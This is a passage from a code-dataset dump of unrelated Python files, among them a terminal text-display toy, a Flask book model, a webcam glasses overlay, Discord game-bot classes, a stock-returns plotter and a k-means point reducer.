')[1][:5].split(':'))\n\n\treturn '{}_{}'.format(date,time)\n\ndef update_data(new_time, new_monified, encrypted, path='data/speech_banana.csv'):\n\n\t'''\n\t\targs:\n\t\t\tnew_time: timestamp from when user used program\n\t\t\tnew_monified: monified input\n\t\t\tpath: path to the csv file where text is saved - no need to 
change\n\n\tThis function updates the data file, and if the file doesn't exist it creates a new one\n\t'''\n\n\ttry:\n\t\tdf = pd.read_csv(path)\n\t\t\n\texcept:\n\t\tdf = pd.DataFrame(data={'text' : [], 'timestamp' : []})\n\n\tnew_row = pd.Series(data={'text' : new_monified, 'timestamp' : new_time ,'ecnrypted_input' : encrypted}, name='x')\n\tnew_df = df.append(new_row, ignore_index=False)\n\tnew_df.to_csv('data/speech_banana.csv', index=False)\n\ndef make_sexy(text, cols, height):\n\t'''\n\targs: \n\t\ttext: the monified text\n\t\t\n\tjust prints the text\n\n\t'''\n\tprint(text.center(cols))\n\t\n\tfor i in range(7):\n\t\tprint('.'.center(cols))\n\n\t\ttime.sleep(1.2)\n\ttime.sleep(1.5)\n\ndef main():\n\tcols, rows, = get_dims()\n\t\n\t\n\tos.system(\"xinput list\")\n\tkey_num = input(\"What is the keyboard's number, xinput list then look for the keyboard id: \")\n\tbanana = gen_banana(cols)\n\t\n\ti =1\n\t\n\twhile i != 2: # creating infinite loop \n\t\tprint(\"\\n\" * 7)\n\t\tprint(banana)\n\n\t\tsubprocess.run('xinput set-prop {} \"Device Enabled\" 1'.format(str(key_num)), shell=True, check=True)\n\t\tprint('\\n'*3)\n\t\ttext = 'Type your sentence below!'\n\t\tprint('{}Hello!\\n{}Do you want to see how I hear?'.format(' '*(int(cols/2-(6 /2))), ' '*(int(cols/2-(29 /2)))))\t\t\n\t\tuser_input = input('{}{}\\n\\n\\n{}'.format(' '*(int(cols/2- (len(text)/ 2))), text,' '*(int(cols/4))).center(int(cols/4)))\n\t\tif user_input == 'quit this fucker':\n\t\t\texit(0)\n\t\t#print(user_input.center(cols))\n\t\tsubprocess.run('xinput set-prop {} \"Device Enabled\" 0'.format(str(key_num)), shell=True, check=True)\n\t\tn = 0\n\n\t\t# loop to make time look like a robot\n\t\twhile n != 5: #number = seconds\n\t\t\tprint(\".\".center(cols))\n\t\t\ttime.sleep(1.2)\n\t\t\tn += 1\n\n\t\tprint(\"\\n\")\n\t\ttimestamp = get_time()#yyyy-mm-dd_mm-ss\n\t\t#audio_path = 'data/audio/{}.mp3'.format(timestamp)\n\n\t\tmonified = monify(user_input)\n\t\t#monified_audio = gtts.gTTS(monified)\n\t\t#monified_audio.save(audio_path)\n\t\t#p = vlc.MediaPlayer(audio_path)\n\t\t#p.play()\n\t\tmake_sexy(monified, cols,rows)\n\t\ttry:\n\t\t\tencrypted_input = encrypt(user_input)\n\t\texcept:\n\t\t\tencrypted_input = 'encryption failed'\n\t\tupdate_data(timestamp, monified, encrypted_input)\n\t\tos.system('clear') #clears screen\n\ndef get_dims():\n\n\tcols, rows = shutil.get_terminal_size()\n\treturn cols, rows\n\nif __name__ == '__main__':\n\t\n\twhile 1 != 2:\n\t\ttry:\n\t\t\n\t\t\tmain()\n\t\texcept KeyboardInterrupt:\n\t\t\tcontinue\n\t\n","sub_path":"run_backup.py","file_name":"run_backup.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"544880093","text":"from . 
import db\n\n\nclass Books(db.Model):\n __tablename__ = 'books'\n book_id = db.Column(db.Integer, primary_key=True)\n link = db.Column(db.String(150), nullable=False, unique=True)\n title = db.Column(db.String(255), nullable=False)\n page_quantity = db.Column(db.String(11), nullable=True)\n lang = db.Column(db.String(25), nullable=False)\n author = db.Column(db.String(80), nullable=False, index=True)\n genre = db.Column(db.String(80), nullable=False)\n\n def __repr__(self):\n return '' % self.title\n\n @property\n def serialize(self):\n return {\n 'id': self.book_id,\n 'link': self.link,\n 'title': self.title,\n 'page_quantity': self.page_quantity,\n 'lang': self.lang,\n 'author': self.author,\n 'genre': self.genre\n }\n\n @staticmethod\n def get_or_create_db_entry(books_dict):\n for id, data in books_dict.items():\n if db.session.query(Books.book_id).filter_by(book_id=int(id)).scalar():\n print('есть в бд')\n else:\n vars()[data['instance_name']] = Books(book_id=int(id), link=books_dict[id]['link'],\n title=books_dict[id]['title'],\n page_quantity=str(books_dict[id]['page_quantity']),\n lang=books_dict[id]['lang'],\n author=books_dict[id]['author'], genre=books_dict[id]['genre'])\n db.session.add(eval(data['instance_name']))\n print('добавлено в бд')\n","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"252121870","text":"import numpy as np\nimport cv2 # pip install opencv-python\nimport math\n\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_frontalface_default.xml\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n#https://github.com/Itseez/opencv/blob/master/data/haarcascades/haarcascade_eye.xml\n\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\nimage = cv2.imread('glasses.png',cv2.IMREAD_COLOR)\n\nrow, col , channels = image.shape\n\ncap = cv2.VideoCapture(0) \n\nflag = 0\n\neyes=[]\n\nwhile 1:\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n \n for (x,y,w,h) in faces: ## we only look for eyes inside faces\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n \n eyes = eye_cascade.detectMultiScale(roi_gray)\n\n \n \n \n\n if (len(eyes) == 2): ## if two eyes are found... 
sometimes objects are misidentified as eyes, and sometimes eyes are not identified \n\n flag = 1\n\n fx = eyes[0,0]+eyes[1,0] \n fx= int(fx/2 + x)\n fy = eyes[0,1]+eyes[1,1] \n fy= int(fy/2 + y)\n\n dis = abs(eyes[0,0]-eyes[1,0])\n print(fx,' ',fy,' ',dis)\n\n \n dis_default = 65 # default distance for the scale of glasses\n dx = 50 # rows offset\n dy = 20 # columns offset\n \n\n\n ratio = dis/dis_default\n\n dx = int(dx*ratio) # shifting offsets to distance\n dy = int(dy*ratio)\n\n size = (int(col*ratio) , int(row*ratio) )\n\n print(ratio,' ',size)\n\n img3 = cv2.resize(image,size) \n\n rows, cols , channels = img3.shape\n\n\n \n\n img3gray = cv2.cvtColor(img3, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img3gray, 10, 255, cv2.THRESH_BINARY)\n mask_inv = cv2.bitwise_not(mask)\n\n\n if flag == 1: # flag is used to wiat for initial position of glasses to be set\n roi = img[fy+0-dy:fy+rows-dy,fx+0-dx:fx+cols-dx] \n img1_bg = cv2.bitwise_and(roi,roi,mask = mask_inv)\n img3_fg = cv2.bitwise_and(img3,img3,mask = mask)\n dst = cv2.add(img1_bg,img3_fg)\n img[fy+0-dy:fy+rows-dy, fx+0-dx:fx+cols-dx] = dst\n\n cv2.imshow('img',img)\n\n\n k = cv2.waitKey(30) & 0xff \n if k == ord('x'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"1)Glares_On_Face.py","file_name":"1)Glares_On_Face.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"259377045","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport sys\n\nfrom recognizer import *\n\nif __name__ == '__main__':\n FULL_PATH = '/home/ldaniel/Desktop/digit-recognizer/CNN/'\n\n model = Recognizer(FULL_PATH)\n\n if sys.argv[1] == 'train':\n model.train()\n elif sys.argv[1] == 'predict':\n comp = pd.read_csv(FULL_PATH + \"input/test.csv\")\n x_comp = comp.iloc[:, :].values.astype('float32')\n x_comp = x_comp.reshape(x_comp.shape[0], 1, 28, 28)\n x_comp /= 255\n\n pred = model.predict_classes(x_comp, load_mode=True)\n\n submissions = pd.DataFrame({\"ImageId\": list(range(1, len(pred) + 1)), \"Label\": pred})\n submissions.to_csv(FULL_PATH + \"output/submission.csv\", index=False, header=True)\n elif sys.argv[1] == 'image_prediction':\n img = Image.open('/home/ldaniel/Desktop/digit-recognizer/backend/src/main/resources/image/image.png')\n img.thumbnail((28, 28), Image.ANTIALIAS)\n\n pix = np.array(img)\n pix = pix[:, :, 3]\n\n pred = model.predict(pix.reshape(1, 1, 28, 28))\n\n submissions = pd.DataFrame({\"Nr\": list(range(0, len(pred[0, :]))), \"Acc\": pred[0, :]})\n submissions.to_csv(FULL_PATH + \"output/image_prediction.csv\", index=False, header=True)\n","sub_path":"digit-recognizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"466437458","text":"\"\"\"Module for holding class structure for the bot to use.\"\"\"\nimport math\nfrom itertools import cycle, islice\nfrom os.path import sep\nfrom random import randint\n\nimport discord\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport auth\nimport database as db\nimport drawing\nfrom vars import bot\nimport utils\n\n\nclass Guild:\n \"\"\"Guild object that stores preferences for a guild the bot is in\n\n Args:\n name (str): The name of the guild\n id (int): The id of the guild from discord\n prefix (str): The custom guild command prefix\n\n Attributes:\n _guilds (dict, int:Guild): Stores all of the created guilds\n name (str): 
The name of the guild\n id (int): The id of the guild from discord\n prefix (str): The custom guild command prefix\n \"\"\"\n _guilds = {} # dict of guilds that have been created\n\n def __init__(self, id, **kwargs):\n self.name = str(bot.get_guild(id))\n self.id = id\n self.prefix = kwargs.get(\"prefix\", \"!\")\n Guild._guilds[id] = self # add guild to the dict\n\n @property\n def dguild(self):\n \"\"\"Returns the discord.py version of the guild\"\"\"\n return bot.get_guild(self.id)\n\n ################## CLASS METHODS ##################\n\n @classmethod\n def get(cls, id):\n \"\"\"Find guild in the dictionary.\"\"\"\n try:\n return cls._guilds[id]\n except KeyError:\n data = db.find_guild(id)\n if data:\n print(\"Guild retrieved from database\")\n return Guild.from_json(data)\n else:\n raise auth.MissingGuild(\"Not Found\")\n\n @classmethod\n def pop(cls, id, alt=None):\n \"\"\"Pop a value off the dict list\"\"\"\n return cls._guilds.pop(id, alt)\n\n ################## JSON CONVERSION ##################\n\n def to_json(self):\n \"\"\"Convert a guild to valid JSON format\"\"\"\n return {\n \"id\": self.id,\n \"prefix\": self.prefix\n }\n\n @staticmethod\n def from_json(data):\n \"\"\"Convert valid JSON to guild object.\"\"\"\n return Guild(\n id=data[\"id\"],\n prefix=data[\"prefix\"],\n )\n\n\nclass Player:\n \"\"\"Global stats\n\n Args:\n id (int): the members discord id\n guild_id (int): The id of the guild the member belongs to\n\n Attributes:\n id (int): the members discord id\n guild_id (int): The id of the guild the member belongs to\n \"\"\"\n _players = {}\n\n RANK_THRESHOLD = 1000\n\n TITLES = (\"Benda\", \"Noob\", \"Amateur\", \"Experienced\",\n \"Skilled\", \"Expert\", \"Semi-Pro\", \"Pro\")\n EXTRA_TITLES = (\"He Who Hands Claps\", \"Sherpa\",\n \"I'm a 1700\", \"I Don't Lose\", \"GC\", \"The Placer\", \"Edumacated\", \"The Prodigy\",\n \"Born Champion\", \"Godly\", \"Unbelievably Talented\", \"Nut\", \"Swanson\")\n\n def __init__(self, id, **kwargs):\n self.name = str(bot.get_user(id).name)\n self.id = id\n\n # Currency/XP\n self.xp = kwargs.get(\"xp\", 0)\n self.pbucks = kwargs.get(\"pbucks\", 0)\n\n # Cosmetics\n self.banner = kwargs.get(\"banner\", \"dice\")\n self.banners = kwargs.get(\"banners\", [\"dice\", \"bonobo\", \"lonewolf\"])\n self.title = kwargs.get(\"title\", \"Benda\")\n self.titles = kwargs.get(\"titles\", [\"Benda\"])\n self.card_bg = kwargs.get(\"card_background\", (\"#000000\", 128))\n\n # Statistics\n self.games_played = kwargs.get(\"games_played\", Game.DEFAULT_STATS)\n self.wins = kwargs.get(\"wins\", Game.DEFAULT_STATS) # fat W's\n self.draws = kwargs.get(\"draws\", Game.DEFAULT_STATS)\n Player._players[id] = self\n\n @property\n def card_background(self):\n \"\"\"Turns hex and opacity to RBGA Tuple\"\"\"\n return utils.hex_to_rgb(self.card_bg[0]) + (self.card_bg[1],)\n\n @property\n def losses(self):\n \"\"\"The losses the player has.\"\"\"\n return {k: self.games_played[k] - self.wins[k] - self.draws[k] for k in self.wins.keys()}\n\n @property\n def ratio(self):\n \"\"\"The Win-Loss ratio for the player.\"\"\"\n ratio_dict = {}\n for k, v in self.wins.items():\n games = v + self.losses[k]\n games = games if games else 1\n ratio_dict[k] = self.wins[k] / games\n return ratio_dict\n\n @property\n def most_played(self):\n \"\"\"Returns the most played game.\"\"\"\n return max(self.games_played, key=self.games_played.get)\n\n @property\n def user(self):\n return bot.get_user(self.id)\n\n @classmethod\n def get(cls, id):\n try:\n return 
cls._players[id]\n except KeyError:\n data = db.find_player(id)\n if data:\n print(\"Player retrieved from database\")\n return Player.from_json(data)\n else:\n raise auth.RegistrationError(\n \"Couldn't find info for player. Make sure that you registered.\")\n\n async def send(self, content=None, embed=None, file=None):\n \"\"\"Passthrough for sending DM.\"\"\"\n await self.user.send(content=content, embed=embed, file=file)\n ################## STAT MANAGEMENT ##################\n\n def update(self, game, won=False, draw=False):\n \"\"\"Update a player.\"\"\"\n old_xp = self.xp\n self.xp += Game.XP_MULTIPLIERS[game] * Game.XP_VALUES[won]\n\n # Acquire new title if needed\n if int(old_xp) // Player.RANK_THRESHOLD != int(self.xp) // Player.RANK_THRESHOLD:\n print(\"TITLE SWITCH\")\n self.title = Player.TITLES[int(self.xp // Player.RANK_THRESHOLD)]\n self.titles.append(self.title)\n\n # update games played\n self.games_played[game] += 1\n if won:\n self.wins[game] += 1\n elif draw:\n self.draws[game] += 1\n\n ################## JSON CONVERSION ##################\n\n def to_json(self):\n \"\"\"Convert Player object to valid JSON.\"\"\"\n return {\n \"id\": self.id,\n \"xp\": self.xp,\n \"pbucks\": self.pbucks,\n \"title\": self.title,\n \"titles\": self.titles,\n \"banner\": self.banner,\n \"banners\": self.banners,\n \"card_background\": self.card_bg,\n \"games_played\": self.games_played,\n \"wins\": self.wins,\n \"draws\": self.draws\n }\n\n @staticmethod\n def from_json(player):\n \"\"\"Create Player object from valid JSON\"\"\"\n return Player(\n id=player[\"id\"],\n xp=player.get(\"xp\", 0),\n pbucks=player.get(\"pbucks\", 0),\n title=player.get(\"title\", \"Benda\"),\n titles=player.get(\"titles\", [\"Benda\"]),\n banner=player.get(\"banner\", \"dice\"),\n banners=player.get(\"banners\", [\"dice\", \"bonobo\", \"lonewolf\"]),\n card_background=player.get(\"card_background\", (\"#000000\", 128)),\n games_played=player.get(\"games_played\", Game.DEFAULT_STATS),\n wins=player.get(\"wins\", Game.DEFAULT_STATS),\n draws=player.get(\"draws\", Game.DEFAULT_STATS)\n )\n\n ################## DRAWING ##################\n\n def draw_banner(self):\n \"\"\"Draws the player's banner.\"\"\"\n # open and set to draw\n banner = Image.open(f\"assets{sep}banners{sep}{self.banner}.png\")\n d = ImageDraw.Draw(banner)\n\n # fonts\n namefnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 47)\n titlefnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 34)\n\n # draw name and title\n _, namey = d.textsize(self.name, namefnt)\n name_offset = 100 - namey\n d.text((40, name_offset), self.name, font=namefnt)\n d.text((40, 105), self.title, font=titlefnt)\n return banner\n\n def draw_banners(self):\n \"\"\"Draws all of the available banners the player has\"\"\"\n\n # Banner dims\n BWIDTH, BHEIGHT = 400, 100\n BMIDDLE = BHEIGHT//2\n MID_PADDING = 10\n ROWS = math.ceil(len(self.banners)/2)\n IMGW = BWIDTH*2+MID_PADDING\n IMGH = ROWS * (BHEIGHT + MID_PADDING) - MID_PADDING\n\n # Create new canvas\n background = Image.new(\n mode=\"RGBA\",\n size=(IMGW, IMGH),\n color=self.card_background\n )\n font = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 30)\n\n for i, name in enumerate(self.banners):\n row = i // 2 * BHEIGHT + MID_PADDING * (i//2) # 00112233\n col = i % 2 * BWIDTH # 01010101\n\n if i % 2 == 1:\n col += MID_PADDING\n\n if i // 2 != 0:\n row + MID_PADDING\n\n banner = Image.open(f\"assets{sep}banners{sep}{name}.png\")\n banner = banner.resize((BWIDTH, BHEIGHT))\n d = ImageDraw.Draw(banner)\n\n _, texty = 
font.getsize(name)\n text_offset = (BWIDTH//10, BMIDDLE - texty//2)\n d.text(text_offset, name, font=font)\n\n background.paste(banner, (col, row))\n return background\n\n def draw_xp(self, gains=0):\n \"\"\"Draws the xp bar\"\"\"\n threshold = Player.RANK_THRESHOLD\n # Create new canvas\n xpbar = Image.new(\n mode=\"RGBA\",\n size=(400, 20),\n color=(128, 128, 128, 128)\n )\n d = ImageDraw.Draw(xpbar) # set image for drawing\n\n x1, y1 = 0, 0\n gains_percentage = ((self.xp + gains) % threshold)/threshold\n x2 = int(400 * gains_percentage)\n y2 = 20\n d.rectangle((x1, y1, x2, y2), fill=(37, 204, 247, 255))\n\n xp_percentage = ((self.xp) % threshold) / threshold\n x2 = int(400 * xp_percentage)\n d.rectangle((x1, y1, x2, y2), fill=(24, 44, 97, 255))\n\n return xpbar\n\n def draw_card(self, crown=False, gains=0):\n c_width = 420\n c_height = 230\n\n # Create new canvas\n background = Image.new(\n mode=\"RGBA\",\n size=(c_width, c_height),\n color=self.card_background\n )\n\n avatar = drawing.get_user_img(self.user, size=128, mask=\"circle\")\n avatar.thumbnail((100, 100), Image.ANTIALIAS)\n\n avatar_offset = (10, 10)\n background.paste(avatar, avatar_offset, avatar)\n\n banner = self.draw_banner()\n banner.thumbnail((400, 100))\n _, bannery = banner.size\n banner_offset = (10, c_height - bannery - 10)\n background.paste(banner, banner_offset)\n\n xpbar = self.draw_xp(gains=gains)\n xpbar.thumbnail((270, 270))\n xpw, xph = xpbar.size\n xpbar_offset = (c_width - (10 + xpw),\n c_height - (10 + bannery + 10 + xph))\n background.paste(xpbar, xpbar_offset)\n\n # Draw winners crown\n if crown:\n crown = Image.open(f\"assets{sep}crownicon.png\")\n crown.thumbnail((20, 20), Image.ANTIALIAS)\n background.paste(crown, (5, 5), crown)\n\n return background\n\n\nclass Game:\n\n _games = {}\n\n DEFAULT_STATS = {\n \"tictactoe\": 0,\n \"hangman\": 0,\n \"battleship\": 0,\n \"rps\": 0 # Rock Paper Scissors\n }\n\n XP_MULTIPLIERS = {\n \"tictactoe\": .1,\n \"hangman\": .2,\n \"battleship\": 1,\n \"rps\": .05 # Rock Paper Scissors\n }\n\n XP_VALUES = {\n True: 100,\n False: 20\n }\n\n def __init__(self, name, channel, *players):\n self.channel = channel\n self.winners = set()\n self.players = list(players)\n self.turn_cycle = islice(cycle(self.players),\n randint(0, len(self.players)-1),\n None)\n self.lead = next(self.turn_cycle) # The player whose turn it is\n self.name = name\n self.id = str(channel.id) + self.name\n\n Game._games[self.id] = self\n\n @property\n def ids(self):\n return {p.id for p in self.players}\n\n @classmethod\n def get(cls, id):\n \"\"\"Get a game based on a member passed in\"\"\"\n return cls._games.get(id)\n\n def next_turn(self):\n \"\"\"Change the lead to the next player in line.\"\"\"\n self.lead = next(self.turn_cycle)\n\n def award_xp(self):\n \"\"\"Awards all game players XP\"\"\"\n for player in self.players:\n player.update(game=self.name,\n won=player.id in self.winners,\n draw=not self.winners)\n\n db.update(*self.players)\n\n def draw_scoreboard(self):\n \"\"\"Draw the scoreboard of players\"\"\"\n BAR_HEIGHT = 100\n IMGW = 900\n ROWS = len(self.players) + 1\n IMGH = ROWS * BAR_HEIGHT\n PADDING_TOP = .1 * BAR_HEIGHT\n\n NAME_PCT = .2\n XP_PCT = .6\n RATIO_PCT = .9\n\n # Make image\n scoreboard = Image.new(\n mode=\"RGBA\",\n size=(IMGW, IMGH),\n color=(0, 0, 0, 0)\n )\n d = ImageDraw.Draw(scoreboard)\n catfnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 50)\n statfnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 40)\n\n # draw categories\n for category, pct in 
zip((\"Player\", \"XP\", \"W/L\"), (NAME_PCT, XP_PCT, RATIO_PCT)):\n msgx, _ = catfnt.getsize(category)\n offset = (pct * IMGW - msgx // 2, PADDING_TOP)\n d.text(offset, category, font=catfnt)\n\n d.line((0, BAR_HEIGHT, IMGW, BAR_HEIGHT),\n fill=(255, 255, 255, 255), width=5)\n\n crown = Image.open(f\"assets{sep}crownicon.png\")\n crown.thumbnail((50, 50), Image.ANTIALIAS)\n\n for i, player in enumerate(self.players, 1):\n # rem = i % len(self.players) + 1 # 0,1,0,1\n top = BAR_HEIGHT * i\n center = top + BAR_HEIGHT//2\n\n # DRAW CROWN\n result = player.id in self.winners\n if result:\n _, cy = crown.size\n scoreboard.paste(crown, (10, center - cy//2), crown)\n\n # DRAW NAME\n msgx, msgy = statfnt.getsize(player.name)\n offset = (NAME_PCT*IMGW - msgx//2,\n center - msgy//2)\n d.text(offset, player.name, font=statfnt)\n\n # DRAW XPBAR\n gains = Game.XP_MULTIPLIERS[self.name] * Game.XP_VALUES[result]\n xpbar = player.draw_xp(gains=gains)\n xpbar_width = int(.4 * IMGW)\n xpbar_height = BAR_HEIGHT - 40\n xpbar = xpbar.resize((xpbar_width, xpbar_height))\n xpbar_offset = (int(XP_PCT * IMGW - xpbar_width // 2),\n center - xpbar_height//2)\n scoreboard.paste(xpbar, xpbar_offset)\n\n # DRAW W/L RATIO\n ratio = player.ratio[self.name] * 100\n msg = f\"{round(ratio, 1)}%\"\n msgx, msgy = statfnt.getsize(msg)\n offset = (RATIO_PCT * IMGW - msgx//2,\n center - msgy//2)\n d.text(offset, msg, font=statfnt)\n\n return scoreboard\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":14900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"14338665","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\n\nx_train = pd.read_csv(\"../input/train.csv\")\n\ntarget = x_train.iloc[:100, -1].values\nX = x_train.iloc[:100, 1:-1].values\n\npca = PCA(n_components=0.8)\nX_new = pca.fit_transform(X)\nX_positive = X_new[target == 1, :]\nX_negative = X_new[target == 0, :]\npos_len = len(X_positive)\n\nclfs = [0] * 25\nfor i in range(25):\n X_part = X_negative[i * pos_len : (i + 1) * pos_len - 1]\n clfs[i] = SVC()\n clfs[i].fit(np.concatenate((X_part, X_positive)), np.concatenate((np.zeros((len(X_part), 1)), np.ones((pos_len, 1)))))\n\ndel target, X_positive, X_negative \nx_test = pd.read_csv(\"../input/test.csv\").values\nresult = np.sum(np.array([clfs[i].predict(pca.transform(x_test[:, 1:])) for i in range(25)]), axis=1) / 25.\nresult = pd.DataFrame({\"ID\": x_test[:, 0].astype('int'), \"TARGET\": result})\nresult.to_csv('submission.csv', index=False)","sub_path":"santander/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"130302101","text":"# 5) FAÇA UM PROGRAMA QUE ITERE UM DICIONARIO COM NOTAS DE ALUNO, FAÇA A MEDIA E SE ELA FOR MAIOR QUE 6 IMPRIMA APROVADO, SENAO IMPRIMA REPROVADO.\n\nalunos = [{\n \"nome\": \"Gabriel\",\n \"idade\": 27,\n \"email\": \"ganbriel@email.com\",\n \"notas\": [ \n 5, 6, 8, 10\n ]\n},\n{\n \"nome\": \"Victor\",\n \"idade\": 27,\n \"email\": \"victor@email.com\",\n \"notas\": [ \n 10, 8, 5, 9, 1 \n ]\n}]\n\nfor a in alunos:\n notas = 0\n for n in a[\"notas\"]:\n notas += n\n if notas/len(a[\"notas\"]) > 6:\n print(\"Aprovado, media: \" + str(notas/len(a[\"notas\"])))\n else:\n print(\"Nao Aprovado, media: \" + str(notas/len(a[\"notas\"])))\n \n\n","sub_path":"python/aula 
3/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"383517923","text":"import numpy as np\nimport random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom pandas_datareader import data as web\nimport time\n\n\n\n##############\n#Some user input here , possibly a GUI for selecting stocks#\n\n\nstart_time = time.time()\n\n\nassets = ['FB' , 'TWTR' , 'CX' , 'NFLX' , 'AMD']\n\nweightings = np.array([0.2 , 0.2 , 0.2 , 0.2 , 0.2])\n\nstockStartDate = '2015-01-01'\n\ntoday = datetime.today().strftime('%Y-%m-%d')\n\ndf = pd.DataFrame()\n\nfor stock in assets:\n df[stock] = web.DataReader(stock , data_source = 'yahoo' , start = stockStartDate , end = today)['Adj Close']\n\n\ntitle = 'Daily Percentage Change'\n\nmy_stocks = df\n\n\ndef returns():\n#create and plot graph (loops through each column)\n for columns in my_stocks.columns.values:\n my_stocks[columns] = my_stocks[columns].pct_change(periods = 10)\n plt.plot(my_stocks[columns] , label = my_stocks)\n\n plt.title(title)\n plt.xlabel('Data' , fontsize= 18)\n plt.ylabel('Adj Price' , fontsize= 18)\n plt.legend(my_stocks.columns.values , loc = 'upper left')\n plt.show()\n\n # for items in my_stocks.columns.values:\n # my_stocks[items] = my_stocks[columns].std()\n\n# def return_distribution():\n\nreturns()\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"FinanceProjects/FinProject.py","file_name":"FinProject.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"467177249","text":"\"\"\"\n@Author: Yu Huang\n@Email: yuhuang-cst@foxmail.com\n\"\"\"\n\nimport scipy.sparse as sp\nimport numpy as np\nfrom collections import Counter\n\nfrom rph_kmeans.point_reducer_base import RPPointReducerBase\nfrom rph_kmeans._point_reducer_cy import get_ary_labels\nfrom rph_kmeans._point_reducer_cy import update_densex_and_weight, update_sparsex_and_weight, update_labels\nfrom rph_kmeans._point_reducer_cy import densex_radius_bkt_improve, sparsex_radius_bkt_improve\nfrom rph_kmeans.utils import cal_dist2_ary_sparse, cal_dist2_ary_dense\n\n\nclass RPPointReducerCy(RPPointReducerBase):\n\tdef __init__(self, w=None, max_point=2000, proj_num=5, max_iter=1000, sample_dist_num=1000,\n\t\t\tbkt_improve=None, radius_divide=None, bkt_size_keepr=1.0, center_dist_keepr=1.0, verbose=1):\n\t\tsuper(RPPointReducerCy, self).__init__(w, max_point, proj_num, max_iter, sample_dist_num,\n\t\t\tbkt_improve, radius_divide, bkt_size_keepr, center_dist_keepr, verbose=verbose)\n\n\n\tdef fit_transform(self, X):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tX (numpy.ndarray or scipy.sparse.csr_matrix): (sample_num, feature_size)\n\t\tReturns:\n\t\t\tnp.ndarray: (reduced_point_num, feature_size); reduced points\n\t\t\tnp.ndarray: (reduced_point_num,); weight, number of samples belonging to each reduced point\n\t\t\tnp.ndarray: (sample_num,); labels, indicating which reduced point each sample belongs to\n\t\t\tint: number of iteration\n\t\t\"\"\"\n\t\tX = self.check_input_X(X)\n\t\tself.check_max_point(self.max_point, X)\n\t\tself.cal_dist2_ary_func = cal_dist2_ary_sparse if self.sparse_x else cal_dist2_ary_dense\n\n\t\tsample_num, feature_size = X.shape\n\t\tself.get_w(X)\n\t\titer_num = 0\n\t\tgroup_num = sample_num\n\n\t\tlabels = np.arange(0, sample_num, dtype=np.uint32)\n\t\tgroup_weight = np.ones((sample_num,), 
dtype=X.dtype)\n\t\treduced_X = X\n\n\t\tif self.verbose > 0:\n\t\t\tprint('Iteration begin: X.shape = {}, max_point = {}, w = {}, proj_num = {}'.format(X.shape, self.max_point, self.w, self.proj_num))\n\t\twhile iter_num < self.max_iter:\n\t\t\tif group_num <= self.max_point:\n\t\t\t\tif self.verbose > 0:\n\t\t\t\t\tprint('Reduced point number {} <= max_point {}. Iteration stop.'.format(group_num, self.max_point))\n\t\t\t\tbreak\n\n\t\t\tproj_vecs, b = self.gen_proj(feature_size, self.w)\n\t\t\tpj_mat = self.random_projection(reduced_X, proj_vecs, b) # (group_num, projection_num)\n\t\t\tbkt_ary, bkt_num = get_ary_labels(pj_mat)\n\n\t\t\tif self.bkt_improve == 'radius':\n\t\t\t\tbkt_num = self.radius_bkt_improve(reduced_X, bkt_ary, self.radius2, bkt_num)\n\t\t\telif self.bkt_improve == 'min_bkt_size':\n\t\t\t\tif self.bkt_size_keepr < 1.0:\n\t\t\t\t\tbkt_num = self.min_bkt_size_bkt_improve(bkt_ary)\n\t\t\telif self.bkt_improve == 'min_center_dist':\n\t\t\t\tif self.center_dist_keepr < 1.0:\n\t\t\t\t\tbkt_num = self.min_center_dist_bkt_improve(bkt_ary, reduced_X)\n\t\t\telse:\n\t\t\t\tif self.bkt_improve is not None:\n\t\t\t\t\traise RuntimeError(\"Parameter bkt_improve must be one of {None, 'radius', 'min_bkt_size', 'min_center_dist'}\")\n\n\t\t\tupdate_labels(labels, bkt_ary)\n\t\t\treduced_X, group_weight = self.update_x_and_weight(reduced_X, group_weight, bkt_ary, bkt_num)\n\n\t\t\tgroup_num = bkt_num\n\t\t\titer_num += 1\n\n\t\t\tif iter_num == 1:\n\t\t\t\tself.cal_dist2_ary_func = cal_dist2_ary_dense\n\n\t\t\tif self.verbose > 1:\n\t\t\t\tgroup_bkt_count, 